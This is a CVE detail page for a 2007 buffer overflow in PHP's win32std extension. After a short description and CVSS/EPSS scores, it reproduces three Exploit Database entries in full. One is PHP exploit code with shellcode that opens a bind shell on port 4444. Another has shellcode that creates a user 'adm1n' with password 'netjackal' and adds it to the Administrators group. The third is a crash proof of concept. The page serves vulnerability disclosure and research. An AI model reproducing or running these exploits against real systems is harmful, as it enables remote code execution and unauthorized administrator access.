CVE-2007-4441 : Detail

CVE-2007-4441

0.08%V3
Local
2007-08-20
22h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in php_win32std.dll in the win32std extension for PHP 5.2.0 and earlier allows context-dependent attackers to execute arbitrary code via a long string in the filename argument to the win_browse_file function.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 4302

Publication date : 2007-08-21 22h00 +00:00
Author : Inphex
EDB Verified : Yes

<?php /* Inphex 317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm. GET /script.php HTTP/1.1\n telnet 192.168.2.32 4444 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\apache> 7ffdf020 7c911005 7c9110ed 00000001 00000000 shoutz go to Kevin Finisterre */ if(!function_exists('win_browse_file')) { die('win32std extension is not available'); } $shellcode= "\x2b\xc9\xb1\x51\xba\xbb\xb2\xd5\x31\xda\xda\xd9\x74\x24\xf4". "\x58\x31\x50\x0e\x83\xc0\x04\x03\xeb\xb8\x37\xc4\xf7\xd7\x5c". "\x6a\xef\xd1\x5c\x8a\x10\x41\x28\x19\xca\xa6\xa5\xa7\x2e\x2c". "\xc5\x22\x36\x33\xd9\xa6\x89\x2b\xae\xe6\x35\x4d\x5b\x51\xbe". "\x79\x10\x63\x2e\xb0\xe6\xfd\x02\x37\x26\x89\x5d\xf9\x6d\x7f". "\x60\x3b\x9a\x74\x59\xef\x79\x5d\xe8\xea\x09\xc2\x36\xf4\xe6". "\x9b\xbd\xfa\xb3\xe8\x9e\x1e\x45\x04\x23\x33\xce\x53\x4f\x6f". "\xcc\x02\x4c\x5e\x37\xa0\xd9\xe2\xf7\xa2\x9d\xe8\x7c\xc4\x01". "\x5c\x09\x65\x31\xc0\x66\xe8\x0f\xf2\x9a\xa4\x70\xdc\x05\x16". "\xe8\x89\xfa\xaa\x9c\x3e\x8e\xf8\x03\x95\x8f\x2d\xd3\xde\x9d". "\x32\x18\xb1\xa2\x1d\x01\xb8\xb8\xc4\x3c\x57\x4a\x0b\x6b\xc2". "\x49\xf4\x43\x7a\x97\x03\x96\xd6\x70\xeb\x8e\x7a\x2c\x40\x7d". "\x2e\x91\x35\xc2\x83\xea\x6a\xa2\x4b\x04\xd7\x4c\xdf\xaf\x06". "\x05\xb7\x0b\xd2\x55\x8f\x03\x1c\x43\x65\xbc\xb3\x3e\x85\x6c". "\x5b\x64\xd4\xa3\x75\x33\xd8\x6a\xd6\xee\xd9\x43\xb1\xf5\x6f". "\xe2\x0b\xa2\x90\x3c\xdb\x18\x3b\x94\x23\x70\x50\x7e\x3b\x09". "\x91\x06\x94\x16\xcb\xac\xe5\x38\x92\x24\x7e\xde\x33\xda\x13". "\x97\x21\x76\xbc\xfe\x80\x4b\xb5\xe7\xb9\x17\x4f\x05\x0c\x58". "\xbc\x63\x91\x1a\x6e\x8d\x2c\xb7\xe3\xfc\xcb\xff\xa8\x55\x80". "\x68\xdd\x57\x64\x7e\xde\xd2\xcf\x80\xf6\x47\x87\x2c\xa6\x26". "\x76\xbb\x49\x99\x29\x6e\x1b\xe6\x1a\xf8\x36\xc1\x9e\x37\x1b". "\x0e\x76\xad\x63\x0f\x40\xcd\x4c\x64\xf8\xcd\xee\xbe\x63\xd1". "\x27\x6c\x93\xfd\xa0\x60\xe1\xfa\x6f\xd3\x09\xd4\x6f\x03\xf5". "\xd9\x8f"; $eip = "\xDC\x1C\x9C\x7C"; //shell32.dll win_browse_file( 1, NULL, str_repeat( "A", 260 )."".$eip."XXXX\x20\xf0\xfd\x7f".str_repeat("C",500).$shellcode.str_repeat("C",300), NULL, array( "*" => "*.*" ) ); ?> # milw0rm.com [2007-08-22]
Exploit Database EDB-ID : 4303

Publication date : 2007-08-21 22h00 +00:00
Author : NetJackal
EDB Verified : Yes

<?php ########################################################## ###----------------------------------------------------### ###--------PHP win32std Buffer Overflow Exploit--------### ###----------------------------------------------------### ###-Tested on:-PHP 5.2.3-------------------------------### ###------------Windows XP SP2 Eng----------------------### ###----------------------------------------------------### ###-Note:-Shellcode is hard coded for Win XP SP2 Eng---### ###----------------------------------------------------### ###-Author:--NetJackal---------------------------------### ###-Email:---nima_501[at]yahoo[dot]com-----------------### ###-Website:-http://netjackal.by.ru--------------------### ###----------------------------------------------------### ########################################################## #Add user: [user]=>"adm1n" [password]=>"netjackal" $SC= "\xEB\x19\x5A\x31\xC0\x50\x88\x42\x52\x52\xBB\x6D\x13\x86". "\x7C\xFF\xD3\xBB\xDA\xCD\x81\x7C\x31\xC0\x50\xFF\xD3\xE8". "\xE2\xFF\xFF\xFF\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63". "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64\x6D\x31". "\x6E\x20\x6E\x65\x74\x6A\x61\x63\x6B\x61\x6C\x20\x2F\x61". "\x64\x64\x26\x26\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67". "\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72". "\x61\x74\x6F\x72\x73\x20\x2F\x61\x64\x64\x20\x61\x64\x6D". "\x31\x6E\x58"; $RET="\x70\xE6\x16\x01"; $BOMB=str_repeat("\x90",24).$SC.str_repeat("A",121).$RET; win_browse_file(1,NULL,$BOMB,NULL,array( "*" => "*.*")); ?> # milw0rm.com [2007-08-22]
Exploit Database EDB-ID : 4293

Publication date : 2007-08-17 22h00 +00:00
Author : boecke
EDB Verified : Yes

<?php // ================================================================================== // // php_win32sti.dll PHP <= 5.2.0 (win32) Buffer Overflow // // [x] Discovery: boecke <[email protected]> // [x] Risk: Local Buffer Overflow (Medium - High Risk) // [x] Notes: EDX and EIP are able to be controlled and therefore // have the potential to dictate program flow. // // [x] "Sangre, sonando, de rabia naci.. Who do you trust?" // // ================================================================================== if ( !extension_loaded("win32std") ) { die; } win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) ); ?> # milw0rm.com [2007-08-18]

Products Mentioned

Configuraton 0

Php>>Php >> Version To (including) 5.2.0

References

https://www.exploit-db.com/exploits/4293
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/25414
Tags : vdb-entry, x_refsource_BID